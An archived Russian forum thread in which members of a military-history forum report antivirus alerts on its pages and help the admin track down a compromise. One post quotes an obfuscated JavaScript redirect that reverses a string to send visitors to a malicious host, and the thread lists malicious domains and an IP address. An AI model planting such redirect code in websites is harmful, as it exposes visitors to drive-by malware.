При этом, пользоваться форумом разрешает, ничего не блокирует. При открытии страниц сайта - тишина. Верещит тогда, когда пытаюсь открывать страницы форума.
Полная версия: Вирус? на форуме?
Второй месяц при открытии данного форума или любой его страницы антивирусник "Аваст" верещит и выдает такое кино
При этом, пользоваться форумом разрешает, ничего не блокирует. При открытии страниц сайта - тишина. Верещит тогда, когда пытаюсь открывать страницы форума.
При этом, пользоваться форумом разрешает, ничего не блокирует. При открытии страниц сайта - тишина. Верещит тогда, когда пытаюсь открывать страницы форума.
А картинка где?
Кто-то отредактировал мое сообщение. Перезалил и повторяю другой прогой здесь:
Цитата
Кто-то отредактировал мое сообщение.
Кто?
Последнее действие модератора:
4.11.2010, 22:42
Последнее действие администратора:
4.11.2010, 23:38
А тема создана:
6.11.2010, 10:51
Шайтан?
Цитата
Второй месяц при открытии данного форума или любой его страницы антивирусник "Аваст" верещит и выдает такое кино
И что молчали 2 месяца? У меня касперский молчит..... Но спасибо за наводку, сейчас будем посмотреть.
После прочтения об отсутствии картинки (я картинку наблюдал!) посмотрел свое сообщение и заметил, что после картинки появились лишние буквы "url]", а внизу "Сообщение отредактировал ..... - Сегодня, 11:10". Имя не запомнил, что-то на латинице, или на "b", или на "d", время - где-то около 11.10. Картинку, как сказал, перезалил.
Цитата
И что молчали 2 месяца? У меня касперский молчит.....
Молчал потому, что есть подозрение на Аваст. Он у меня бесплатный, а тут стал "вымогать", чтоб я поставил платный - стал свою рекламу слать. Вот я и терпел. А, сегодня полазил по всему форуму и не выдержал, когда он после открытия любой страницы - верещит. Но, за неделю верещал, кроме данного форума, еще только в паре мест, хотя в инете копаюсь много. К тому же поставил Аваст еще на пяти компах - там молчит - они на этот форум не ходят.
Наблюдение.
у меня _иногда_ при входе на форум на одной из машин открывается консоль джавы (ну вот просто включена консоль на той машине) с воплями о том, что "не удается", "запрещено", "не хватает прав" и так далее в этом роде.
Глубже не копал.
у меня _иногда_ при входе на форум на одной из машин открывается консоль джавы (ну вот просто включена консоль на той машине) с воплями о том, что "не удается", "запрещено", "не хватает прав" и так далее в этом роде.
Глубже не копал.
Цитата(Дедок @ 6.11.2010, 19:58) 
После прочтения об отсутствии картинки (я картинку наблюдал!) посмотрел свое сообщение и заметил, что после картинки появились лишние буквы "url]", а внизу "Сообщение отредактировал ..... - Сегодня, 11:10". Имя не запомнил, что-то на латинице, или на "b", или на "d", время - где-то около 11.10. Картинку, как сказал, перезалил.
Цитата
И что молчали 2 месяца? У меня касперский молчит.....
Молчал потому, что есть подозрение на Аваст. Он у меня бесплатный, а тут стал "вымогать", чтоб я поставил платный - стал свою рекламу слать. Вот я и терпел. А, сегодня полазил по всему форуму и не выдержал, когда он после открытия любой страницы - верещит. Но, за неделю верещал, кроме данного форума, еще только в паре мест, хотя в инете копаюсь много. К тому же поставил Аваст еще на пяти компах - там молчит - они на этот форум не ходят.Подтверждаю, у меня Avast тоже ругается, так же. А раньше адрес объекта был другим.
А это не может быть из какой-то картинки в самом низу странице?
Цитата
А это не может быть из какой-то картинки в самом низу странице?
Попробовал открыть все рекламные картинки снизу плюс текстовую рекламу - тишина.
Открыл пару окон в текстовой версии - тишина. Перешел из текстовой версии в полную - завопил!
Интересно, что скажут форумчане с другими антивирусниками?
Есть какая то бяка завязанная на Acrobat ... у мну постоянно выскакивает обновление при входе на сайт. NOD32 надыбал какуютобяку и блокирнул ее...
Да и сайт видится как-то не так изображение задвоенное (ноги богатырей двоятся блин)
Да и сайт видится как-то не так изображение задвоенное (ноги богатырей двоятся блин)
А я думал, что с ногами - так и должно быть....
С ногами от браузера зависит.
пользуЮ Аваст, все в норме, совсем не кричит)
ноги не двоятся
ноги не двоятся
Волк так это появилось какое-то время назад... При чем тут браузер?... А вот с какого перепуга при входе на форум запрашивается обновление Adobe Reader.
А находится как бяка вот это JS/Exploit.Pdfka.OJR
А находится как бяка вот это JS/Exploit.Pdfka.OJR
1. Сегодня, сейчас зашел на форум с двух компов с Авастом. Всё прорыл - нигде никто не заверещал.
Спасибо, видно, эта проблема снята.
2. На картинку обратил внимание только сегодня после прочтения ваших сообщений. Константирую:
а) с Оперой и Мозиллой - картинка нормальная везде.
б) с Эксплорером 8 и Media Browser v5.2 искажена, как товарищи указали выше. Но, только на форуме. Прошерстил Главное меню портала (сайта) - везде картинка в норме, кроме любой страницы форума.
Но, ИМХО, это уже не смертельно. Админам и их помощникам спасибо за оперативность в решении проблем.
P.S. Про Adobe Reader. На одном компе - тишина, (куда уж новее, и так стоит 9.4.0), на втором - версия постарше - при включении компа, я еще и о Войсках не подумал, сразу просится обновить - но, это видно, так у меня в настройках. Войска - ни при чём.
Спасибо, видно, эта проблема снята.
2. На картинку обратил внимание только сегодня после прочтения ваших сообщений. Константирую:
а) с Оперой и Мозиллой - картинка нормальная везде.
б) с Эксплорером 8 и Media Browser v5.2 искажена, как товарищи указали выше. Но, только на форуме. Прошерстил Главное меню портала (сайта) - везде картинка в норме, кроме любой страницы форума.
Но, ИМХО, это уже не смертельно. Админам и их помощникам спасибо за оперативность в решении проблем.
P.S. Про Adobe Reader. На одном компе - тишина, (куда уж новее, и так стоит 9.4.0), на втором - версия постарше - при включении компа, я еще и о Войсках не подумал, сразу просится обновить - но, это видно, так у меня в настройках. Войска - ни при чём.
каое-то время не было, а сегодня опять та же бяка - предупреждение о вирусе от аваста
сегодня аваст опять орёт о вирусе
Нажмите для просмотра прикрепленного файла
Нажмите для просмотра прикрепленного файла
Честно говоря затрудняюсь дать какой либо внятный ответ, на проблему.
Был выкачан весь контенет по фтп, и проверен касперским и нортоном - чисто.
В указанных скринах нет никакого намека на войска типо _http://voiska.ru/forum/index.php и т.п.
Жалуются в основном пользователи аваста, у меня например касперский молчит.
Проблема появляется при заходе на сайт, и я никак не могу связать эти события с нашим форумом...
Я в печали....
Был выкачан весь контенет по фтп, и проверен касперским и нортоном - чисто.
В указанных скринах нет никакого намека на войска типо _http://voiska.ru/forum/index.php и т.п.
Жалуются в основном пользователи аваста, у меня например касперский молчит.
Проблема появляется при заходе на сайт, и я никак не могу связать эти события с нашим форумом...
Я в печали....
Цитата(Радист @ 22.11.2010, 12:39)
сегодня аваст опять орёт о вирусе
Нажмите для просмотра прикрепленного файла
Нажмите для просмотра прикрепленного файла
Цитата
ВРЕДОНОСНЫЙ URL-АДРЕС БЛОКИРОВАН (-А)
Для дополнительной информации посетите портал Сообщества avast!.
Объект: kilopamino.com/index11
Заражение: URLMal
Действие: Блокировано
Процесс: C:\Program Files\Opera\opera.exe
Для дополнительной информации посетите портал Сообщества avast!.
Объект: kilopamino.com/index11
Заражение: URLMal
Действие: Блокировано
Процесс: C:\Program Files\Opera\opera.exe
После вскрытия (а точнее - поверхностного свежевания) -так, честно говоря, и не понял, что ЭТО kilopamino.com/index11 должно было делать.
Предположительно - создать окно (невидимое ?) не менее 300 на 300 и что-то втянуть в него.
Имею предположение, что оно не в тексте движка форума, а прицепленно, возможно, по ссылкам откуда-то снаружи (баннеры? обменные линки? ... )
Повеселила строка
Код
window.location=url_de("2?igc.ni/moc.onimapolik//:ptth") ...
function url_de(s)
{
return s.split("").reverse().join("");
}
Ну то есть в коде странички скорее всего прописано именно "2?igc.ni/moc.onimapolik//:ptth", и только на стороне клиента уже в его клиентской джаве оно "легким движением руки" ( function url_de(s){return s.split("").reverse().join("");} ) превращается в kilopamino.com/in.cgi?ну_и_так_далее поэтому искать это на сервере как kilopamino бесполезно ...
( как-то так ... просто мысли в слух ...
)Цитата(Noxious @ 22.11.2010, 13:36)
Был выкачан весь контенет по фтп, и проверен касперским и нортоном - чисто.
Проверял ли каспер и нортон содержимоме sql файла?
Честно говоря я не знаю, как они обрабатывают sql-файлы (а не игнорят ли вообще как не исполнимые? И есть ли у них в сигнатурах текстовая строка что-то типа url_de("2?igc.ni/moc.onimapolik//:ptth"), например ... и сигнатура ли это для антивируса него а не просто стринг ?... )
Цитата(Noxious @ 22.11.2010, 13:36)
В указанных скринах нет никакого намека на войска типо _http://voiska.ru/forum/index.php и т.п.
... ну тут есть нюанс.
Аваст не пишет откуда вызывался URL. Он только фиксирует что он заблокировал, без реферера.
(вот бы еще к такой картинке получить и исходный текст странички на момент срабатывания...
). Ну типа - обновили страничку, получили срабатывание, и кроме картинки со срабатыванием, например, в той же опере "средства разработчика - исходный код - сохранить как ... " ). Ну типа кроме "покраснело и чешется" - еще и "анализ" ... Но только именно в тот момент, когда сработало.
Цитата(Noxious @ 22.11.2010, 13:36)
Проблема появляется при заходе на сайт, и я никак не могу связать эти события с нашим форумом...
На сам сайт практически не захожу, 99.% моих заходов сразу на форум.
Некоторое время открывался _ИНОГДА_ AcroReader (совместно с JavaConsole) но вроме бы пофиксили (чуть выше)
Цитата(Noxious @ 22.11.2010, 13:36)
Я в печали....
... понимаю ... сам такое бываю иногда ...
Цитата
Имею предположение, что оно не в тексте движка форума, а прицепленно, возможно, по ссылкам откуда-то снаружи (баннеры? обменные линки? ... )
Думал, копал, ковырял.... В счетчиках, и рекламе яндекса ничего подобного не нашел, а больше ничего и нет.... даже подписи пользователей шерстил.
Цитата
moc.onimapolik
по тексту нигде не встречается... я про код естественно....
Цитата
Контент, включая шаблоны и sql базу? (не очень знаком с анатомией именно этого движка)
Проверял ли каспер и нортон содержимоме sql файла?
Проверял ли каспер и нортон содержимоме sql файла?
Именно. Ксапер крайняя версия для серверов - все чисто....
Вот за нортон не ручаюсь...
Сейчас аваст молчит. 
Вирусы тему читают...затаились 
... не, просто спугнули ... ( "поклодь гранату на место" (с) ... 
)
)
Хм. Дальнейшее препарирование тушек показало...
ну во первых - заблокированный на картинке с первой страницы peepolie.com/index11 оказался одним и тем же что и "свежий" с kilopamino.com/index11
соответственно - все те же эти, но в профиль. Рецидив, так сказать. Теперь бы с профилем разобраться.
Где-нибудь в природе есть что-то похожее на пристойное описание того, как Avast классифицирует вирусы и так далее (наподобие описаний вирусов как на порталах "лабораторий" Касперского и Данилова). Чтобы знать хотя бы примерно что имеется ввиду под URL:Mal (я так подозреваю что имелось ввиду что-то типа "malware over URL"). Единственное вразумительное упоминание URL:Mal на форуме avsoft.ru/forum отправляют на ветку с описанием полного лечения компьютера с использованием альтернативного программаного обеспечения - AVZ, CureIT, HiJackThis.
Есть мнение - таки испросить всех, у кого срабатывал Avast, попробовать проверить комп при помощи действительно таки AVZ , CureIt и ComboFix ... (ну так сказать - контрольная проба).
ну во первых - заблокированный на картинке с первой страницы peepolie.com/index11 оказался одним и тем же что и "свежий" с kilopamino.com/index11
Код
vovaz02h@book-vovaz02h:~$ host kilopamino.com -t A
kilopamino.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ host peepolie.com -t A
peepolie.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ _
kilopamino.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ host peepolie.com -t A
peepolie.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ _
соответственно - все те же эти, но в профиль. Рецидив, так сказать. Теперь бы с профилем разобраться.
Где-нибудь в природе есть что-то похожее на пристойное описание того, как Avast классифицирует вирусы и так далее (наподобие описаний вирусов как на порталах "лабораторий" Касперского и Данилова). Чтобы знать хотя бы примерно что имеется ввиду под URL:Mal (я так подозреваю что имелось ввиду что-то типа "malware over URL"). Единственное вразумительное упоминание URL:Mal на форуме avsoft.ru/forum отправляют на ветку с описанием полного лечения компьютера с использованием альтернативного программаного обеспечения - AVZ, CureIT, HiJackThis.
Есть мнение - таки испросить всех, у кого срабатывал Avast, попробовать проверить комп при помощи действительно таки AVZ , CureIt и ComboFix ... (ну так сказать - контрольная проба).
Только что при попытке зайти в ветку славянский союз выругался касперский на "заргузку объекта, содержащего троянскую программу":
http://zebuqud.co.cc/awstats/05d65b0e148dc...e1d6da730.class
http://zebuqud.co.cc/awstats/05d65b0e148dc...e1d6da730.class
5 Avast, firefox 3,6 - ни разу не было никаких ругательств... Я, честно говоря, сначала подумал что вы прикалываетесь...
Форвардит на гугл.ру , аваст не ругается
Цитата
Форвардит на гугл.ру , аваст не ругается
Открой доступ к оригиналу, а то ни фига толком не видно.
Открыл
Уже начинает надоедать. Не только Аваст, но и Яндекс предупреждает:
Это не фотомонтаж. Попробуйте сами открыть эту страницу: http://yandex.ru/infected?url=http%3A%2F%2...ect&l10n=ru
Далее: антиреклама форума от Яндекса:
Это не фотомонтаж. Попробуйте сами открыть эту страницу: http://yandex.ru/infected?url=http%3A%2F%2...ect&l10n=ru
Далее: антиреклама форума от Яндекса:
Достал меня этот вирус. Аваст не дурак, поди...
Который раз (но не каждый), при заходе на сайт, вылетает запрос... Кто знает, что это?
Нажмите для просмотра прикрепленного файла
Жму на "отменить" и захожу на "Войска"... Может надо "Принять"?
Нажмите для просмотра прикрепленного файла
Жму на "отменить" и захожу на "Войска"... Может надо "Принять"?
У меня сегодня утром по монитору начали бегать кошки, собаки, кролики... Думал, что после вчерашнего Но родные и близкие подтвердили мои наблюдения
Но родные и близкие подтвердили мои наблюдения
Цитата(Radi @ 6.2.2011, 17:04)
У меня сегодня утром по монитору начали бегать кошки, собаки, кролики... Думал, что после вчерашнего
Но родные и близкие подтвердили мои наблюдения А "принтскрин", как в моем случае, выложить сможете?
Цитата
Который раз
И у мну аналогично...
У меня пока никто не бегает. Но, вслед за Яндексом тревогу забил Микрософт!
При первом заходе на форум - вот такое предупреждение. Нажал "игнорировать" - далее бегаю по всему форуму, зарегился - всё чисто. Даже, как-то не привычно. Обычно, на каждой странице Аваст верещал. Вышел с форума, опять зашел - чисто и Микрософт молчит.
Пошел на второй комп, там зашел на Войска - и там чисто! Чудеса! Только картинка от Микрософта на память осталась.
При первом заходе на форум - вот такое предупреждение. Нажал "игнорировать" - далее бегаю по всему форуму, зарегился - всё чисто. Даже, как-то не привычно. Обычно, на каждой странице Аваст верещал. Вышел с форума, опять зашел - чисто и Микрософт молчит.
Пошел на второй комп, там зашел на Войска - и там чисто! Чудеса! Только картинка от Микрософта на память осталась.
Цитата
Последняя перепроверка сайта www.voiska.ru не выявила страниц, содержащих вредоносный код.
---
С уважением,
Яндекс.Вебмастер
---
С уважением,
Яндекс.Вебмастер
Вроде разобрался с проблемой.
Всем кто пытался помочь, своей властью поднимаю рейтинг.
И просто спасибо.
Чисто. И тишина.
"Вредному админу" от лица форумчан - благодарность.
По крайней мере, спасибо - заработал.
"Вредному админу" от лица форумчан - благодарность.
По крайней мере, спасибо - заработал.
Всё отлично работает!
Это текстовая версия — только основной контент. Для просмотра полной версии этой страницы, пожалуйста, нажмите сюда.